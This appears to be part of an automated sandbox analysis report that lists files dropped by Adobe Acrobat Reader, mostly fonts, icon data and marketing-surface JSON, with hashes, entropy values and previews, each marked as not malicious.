                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:PostScript document text
                                                                  Category:dropped
                                                                  Size (bytes):10880
                                                                  Entropy (8bit):5.214360287289079
                                                                  Encrypted:false
                                                                  SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                  MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                  Malicious:false
                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):243196
                                                                  Entropy (8bit):3.3450692389394283
                                                                  Encrypted:false
                                                                  SSDEEP:1536:vKPCPiyzDtrh1cK3XEivK7VK/3AYvYwgqErRo+RQn:yPClJ/3AYvYwghFo+RQn
                                                                  MD5:F5567C4FF4AB049B696D3BE0DD72A793
                                                                  SHA1:EBEADDE9FF0AF2C201A5F7CC747C9EA61CFA6916
                                                                  SHA-256:D8DBFE71873929825A420F73821F3FF0254D51984FAAA82E1B89D31188F77C04
                                                                  SHA-512:E769735991E5B1331E259608854D00CDA4F3E92285FDC500158CBD09CBCCEAD8A387F78256A43919B13EBE70C995D19242377C315B0CCBBD4F813251608C1D56
                                                                  Malicious:false
                                                                  Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):295
                                                                  Entropy (8bit):5.327346121185668
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXHWsigrHHJ9VoZcg1vRcR0YoeoAvJM3g98kUwPeUkwRe9:YvXKX2sigrn2Zc0v7GMbLUkee9
                                                                  MD5:909850C7BB66850195DE8EB0AC1D97F4
                                                                  SHA1:0E0B3D9BEEB8463B81A7DBB7B0A0AA2368332E67
                                                                  SHA-256:77535DE598CD6F41C207E166725961EF097BCE271C519F4D598F1ED84DA23758
                                                                  SHA-512:3918B6C781AEA60B15D323774DCF7893FB30C9160483E0B60B345E4C76817A8DB9B84D1DD17967A3138676E024F9CB0822BD76B1BC3B144B5868AA3E00F76B76
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"03981413-fac3-40c1-89aa-4cc747a3453e","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734847645580,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):294
                                                                  Entropy (8bit):5.27671381819
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXHWsigrHHJ9VoZcg1vRcR0YoeoAvJfBoTfXpnrPeUkwRe9:YvXKX2sigrn2Zc0v7GWTfXcUkee9
                                                                  MD5:4E54309189ECE78985A695B09B594490
                                                                  SHA1:CDD82A9ADCD5EF452BBF640893F6367326F608E2
                                                                  SHA-256:2416986B0052D1756D7E7D4C7FD55A2557186E89D74DC7316F7EB68A5031A39D
                                                                  SHA-512:0B9596AA5F4A961A5455791E9B3F9423C8D94D3DB9AAD95D9314AE9C210E0E434BC83A988131414456520553121160C91876032699A4E506AE7ABB3FF2E79212
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"03981413-fac3-40c1-89aa-4cc747a3453e","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734847645580,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):294
                                                                  Entropy (8bit):5.254186067393628
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXHWsigrHHJ9VoZcg1vRcR0YoeoAvJfBD2G6UpnrPeUkwRe9:YvXKX2sigrn2Zc0v7GR22cUkee9
                                                                  MD5:602FBA9228E821F7B294C104F0C79FAA
                                                                  SHA1:FF12EDDEEAA8470DA16142A6A7EE3C64B094348A
                                                                  SHA-256:91C479BC61CF636BE27DEA9004FEC2886DC6AA72C996245F6204B25D9A24FCEE
                                                                  SHA-512:7D352612B80EB7F9D79B7C37044E79BF155E51FF6B94F99AD8CF05CD64E7937169A958A66F272AAC7DEB77C1C8A4E4AA0909267B52A3A85FABDFA91BE2084269
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"03981413-fac3-40c1-89aa-4cc747a3453e","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734847645580,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):285
                                                                  Entropy (8bit):5.313092863692002
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXHWsigrHHJ9VoZcg1vRcR0YoeoAvJfPmwrPeUkwRe9:YvXKX2sigrn2Zc0v7GH56Ukee9
                                                                  MD5:676B1E53FEED7CE357B6DCA5D5FB5582
                                                                  SHA1:561DC999475EDD9D8AD4604204EC539F93DC3C0E
                                                                  SHA-256:E793D52AE72153A796C7C34A535E4A2DB39BC1C11E6420A7B2869B815EF7666D
                                                                  SHA-512:A24188FBE875EC528F802FC530F3DC061A28CDE6B2332E7D90C560F46251B4FCB5A1CF6F2B3BCBA23C9506DBE3C8940D722B5931CEB6EA70ECBB1FEE639BA8C6
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"03981413-fac3-40c1-89aa-4cc747a3453e","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734847645580,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):1123
                                                                  Entropy (8bit):5.686196485683101
                                                                  Encrypted:false
                                                                  SSDEEP:24:Yv6X2U2zvQpLgE9cQx8LennAvzBvkn0RCmK8czOCCSyX:YvVUuYhgy6SAFv5Ah8cv/U
                                                                  MD5:B3C12B661112E677A34573D49CE5911F
                                                                  SHA1:56146907BD7314DA128067C7BBE10786A51C62C7
                                                                  SHA-256:E3086F6380B4CB67C90EEB4F7FBDDFF21FA7D59DE11B182807D10B57D1E52E91
                                                                  SHA-512:DF6D430AAD62228ECE8C0EA788ECB5C7C53DFC19C3F7BFCA9D7712FBF564D0C5433520EF6F0F2B799EC278BF874D0DACBDDF88C9D48F38DEB70519A6AF8BCC2B
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"03981413-fac3-40c1-89aa-4cc747a3453e","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734847645580,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):289
                                                                  Entropy (8bit):5.26126774022713
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXHWsigrHHJ9VoZcg1vRcR0YoeoAvJf8dPeUkwRe9:YvXKX2sigrn2Zc0v7GU8Ukee9
                                                                  MD5:23D663D0B83AA001609D47A0F9D3011F
                                                                  SHA1:62AB95C4368715FE9961B6849E1893C8349CE390
                                                                  SHA-256:EB552ED7A2F8AB77C75EE204F741D9009F74D35D494A806BAE6B036B6166463E
                                                                  SHA-512:E8CE6DF58193375E79D32F7D33ACF427DE0E976C7C390EE716B358E4E52749B5F6FE4F2235F441FF60B1741C739032E76241DAEAEC3CB256DB0EC3B106A23065
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"03981413-fac3-40c1-89aa-4cc747a3453e","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734847645580,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):292
                                                                  Entropy (8bit):5.266422535546601
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXHWsigrHHJ9VoZcg1vRcR0YoeoAvJfQ1rPeUkwRe9:YvXKX2sigrn2Zc0v7GY16Ukee9
                                                                  MD5:2575792ACC09C593176E99E62490583B
                                                                  SHA1:9E7F901D2E698E57F1E2F02961FC3B0EF65AD3E4
                                                                  SHA-256:2201F4995F7B35315143E342CB880D98DA59B3FE8D9FA54AAC85489A2F0AE557
                                                                  SHA-512:BE4B7355D77E56EAF98DCBFF983EE64DC48138FC5CBE086180EF7D7013177106F35B15522B99390024E65F3D7E5FC90F7B644C0B9DB2081853CBEF06AC98D73B
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"03981413-fac3-40c1-89aa-4cc747a3453e","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734847645580,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):289
                                                                  Entropy (8bit):5.273708268931936
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXHWsigrHHJ9VoZcg1vRcR0YoeoAvJfFldPeUkwRe9:YvXKX2sigrn2Zc0v7Gz8Ukee9
                                                                  MD5:825C342FFD0FFF3BF1588B277EC5A623
                                                                  SHA1:B222EFFE65FEBF5D7FC7E1EC0384C38B305A86FF
                                                                  SHA-256:A9BA8A36FC89DA2FFA6079ADFA13C1639615A426DC2DAF2CB18FB6B1390F1713
                                                                  SHA-512:2C69296B3937FD0D2D12DE5D275FB8A636C8CC2389B31EFAF3D2D5BC34D0453D0C5759785B1DAD4C318D91292A4A8C7EBA005012ACBB276B1D88CCFC51A73C71
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"03981413-fac3-40c1-89aa-4cc747a3453e","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734847645580,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):295
                                                                  Entropy (8bit):5.288186370301646
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXHWsigrHHJ9VoZcg1vRcR0YoeoAvJfzdPeUkwRe9:YvXKX2sigrn2Zc0v7Gb8Ukee9
                                                                  MD5:20BD48C1BF672CC4C5446253D99FD324
                                                                  SHA1:70B130EA5C27CB264D18BE7A3B501FA79B8823F0
                                                                  SHA-256:724EB4DB1DD9FAE1E0002C37A1BDE3B24D0AF2EA40BBC8FB30ADE85A3E243C24
                                                                  SHA-512:738EE81466AA37734B62DE8F39F279EFC450CBAEE5506219AC3518ED9E8A8AC53AF7A641DB7E110898A604A4E4E326D5C3CDD4E2B52BE74E4115F30B1269C850
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"03981413-fac3-40c1-89aa-4cc747a3453e","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734847645580,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):289
                                                                  Entropy (8bit):5.268723171600978
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXHWsigrHHJ9VoZcg1vRcR0YoeoAvJfYdPeUkwRe9:YvXKX2sigrn2Zc0v7Gg8Ukee9
                                                                  MD5:A8EC0357C4701C12152B350315E78608
                                                                  SHA1:7020F65FCF828DAE1FF46B90B0C456E9B6700355
                                                                  SHA-256:CE6353BD0A6CC0240D0B3F4C8CADBB4E806A279B94481101EA42831DA535AEE4
                                                                  SHA-512:AC42842F34679480453CF11186131A89F4F0D38B627370E374848AC09663A45D71CEE92CCB49542AC6708D7FF3A7A86F8590B8464F8A9160B9E8229BDBDEECF2
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"03981413-fac3-40c1-89aa-4cc747a3453e","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734847645580,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):284
                                                                  Entropy (8bit):5.254222896036546
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXHWsigrHHJ9VoZcg1vRcR0YoeoAvJf+dPeUkwRe9:YvXKX2sigrn2Zc0v7G28Ukee9
                                                                  MD5:95CD883F5B420A12BE859526A1C04DC3
                                                                  SHA1:F71BF7AF34637E6A91B8EBD5EFFF01BACB6DC878
                                                                  SHA-256:AFAC2292C8D93353821B7E0E63615D9A5A804EF7762D4BE2B2B3BE0D680B8C23
                                                                  SHA-512:F4E152A0A53F42F51E72EC6D677925A523AED357DC38829CF3BB2F93E4D9B79D36A64CE3424DB93364FAC544F325866546716CD4AF0AB303296605818FD5EF7C
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"03981413-fac3-40c1-89aa-4cc747a3453e","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734847645580,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):291
                                                                  Entropy (8bit):5.252485230294767
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXHWsigrHHJ9VoZcg1vRcR0YoeoAvJfbPtdPeUkwRe9:YvXKX2sigrn2Zc0v7GDV8Ukee9
                                                                  MD5:F1FC5F31164FC2FF85602D3CDB62F69D
                                                                  SHA1:1919E15A56B8C4AAAE8A777AD3151786B345004B
                                                                  SHA-256:7B8FE3DB900340D50A2BE23C80EB05B39BC1E6D2D637D7B84567F3919FCB8D9F
                                                                  SHA-512:3285C51092ADCA5F1E960D6745303AFF9E094F6B60AC1C709A571C611CFA83C004589C8A8C9ADA3ADE01395AB4130106A0098748DE8B1E91C9032996415DF4EB
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"03981413-fac3-40c1-89aa-4cc747a3453e","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734847645580,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):287
                                                                  Entropy (8bit):5.257279041672087
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXHWsigrHHJ9VoZcg1vRcR0YoeoAvJf21rPeUkwRe9:YvXKX2sigrn2Zc0v7G+16Ukee9
                                                                  MD5:36D0EE7EEBA16ADAE097925C34E8AB7C
                                                                  SHA1:029501245A36DB1C05FCCD087C705C8676435A68
                                                                  SHA-256:918C300F61EC16FCDB92F54831C95C3D207EB28E93D07EA7538EC1E632028142
                                                                  SHA-512:01EB021CDBD1044E7FB7049DE523D9D887D051A557B9EACCFA65A939B22403189FF08FB11F61BB9D4A71381CFB899A0C18E06225D4B1847C67399672A70037E7
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"03981413-fac3-40c1-89aa-4cc747a3453e","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734847645580,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):1090
                                                                  Entropy (8bit):5.664118555768477
                                                                  Encrypted:false
                                                                  SSDEEP:24:Yv6X2U2zvUamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSyX:YvVUuKBgkDMUJUAh8cvMU
                                                                  MD5:4A80EFF7F40BF4D709868F2642BCB5B4
                                                                  SHA1:7E297B1EAC03FEF1CCFEAF2C8E92396470A284F6
                                                                  SHA-256:B2B7069D41878A22DFB351A3E3EC8AA7E6E767142FF24C4CA98F755500BCCAA0
                                                                  SHA-512:DB051C2C23DC819218D5F16612E326CD3DFA0BB03161ED30AB303356BDCDCF04D4EA9A87FC5BA9C1764D18F8F1AD20CDFD96B9957BA45E26D387FE21BB880D25
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"03981413-fac3-40c1-89aa-4cc747a3453e","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734847645580,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):286
                                                                  Entropy (8bit):5.234228376015391
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXHWsigrHHJ9VoZcg1vRcR0YoeoAvJfshHHrPeUkwRe9:YvXKX2sigrn2Zc0v7GUUUkee9
                                                                  MD5:31DA36E2791D1F5692247857E95C5CF2
                                                                  SHA1:699C72AC103A3FCBBF158BAC2AA65D494316C592
                                                                  SHA-256:D12176A13576FC1E09BCC1C77AB55105C92CE376768C51342DA320DDD25F3308
                                                                  SHA-512:89520780F5E0D5E75EC53AD357B15DDF6DCFD213C6129963F33D823510D165BE92E374FB72B7070CBD0511EFFDC7F8A312C52D302B986D4780EA26BDA674B448
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"03981413-fac3-40c1-89aa-4cc747a3453e","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734847645580,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):282
                                                                  Entropy (8bit):5.24762077442585
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXHWsigrHHJ9VoZcg1vRcR0YoeoAvJTqgFCrPeUkwRe9:YvXKX2sigrn2Zc0v7GTq16Ukee9
                                                                  MD5:27F4E3F1AE11760A639DF0B6967A38B8
                                                                  SHA1:C2AF8DE502E71218823A1058B3A636D98D5058E0
                                                                  SHA-256:FB32D5E7773C485EFA835AE428F7ADD3816766918881A328F5E195C931AB0856
                                                                  SHA-512:25A0B0AE83B304B27E461DB6B8E6A350613E5AFE59E0ACC653C5D284E2E30CA79E2795A96A63D203A3144A35CE712C56222BDD1C3C7AE3B59C26A6851BFB7B99
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"03981413-fac3-40c1-89aa-4cc747a3453e","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734847645580,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):4
                                                                  Entropy (8bit):0.8112781244591328
                                                                  Encrypted:false
                                                                  SSDEEP:3:e:e
                                                                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                  Malicious:false
                                                                  Preview:....
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):2814
                                                                  Entropy (8bit):5.1365447454983
                                                                  Encrypted:false
                                                                  SSDEEP:24:YRIRakcQayP75/EOXEpknUDPj8NxIwIfpZy7ij0Gj0Sdwdsl2xO2LSd6CUMAq8nI:YAc4xQL4N+pjzJ8OCPMR8nztgi9Fbo
                                                                  MD5:59D344BB6FD4585A5919DD4791AB622F
                                                                  SHA1:49B5C9C55709AE7B50B138FDA2F180A0440DBB28
                                                                  SHA-256:FAB8B663CE7C095A76826CF208E01091743F794D38E047971EF67707359FF506
                                                                  SHA-512:FD440A6549E535A4CCA9FAAE453FCC0ADC06C6E70324F50DD02C31FA1388D9B7199E45D4DEF9E6324DFEFB32B23155B6E33F0C9D588191EEACEEAD4C7DBAE3F2
                                                                  Malicious:false
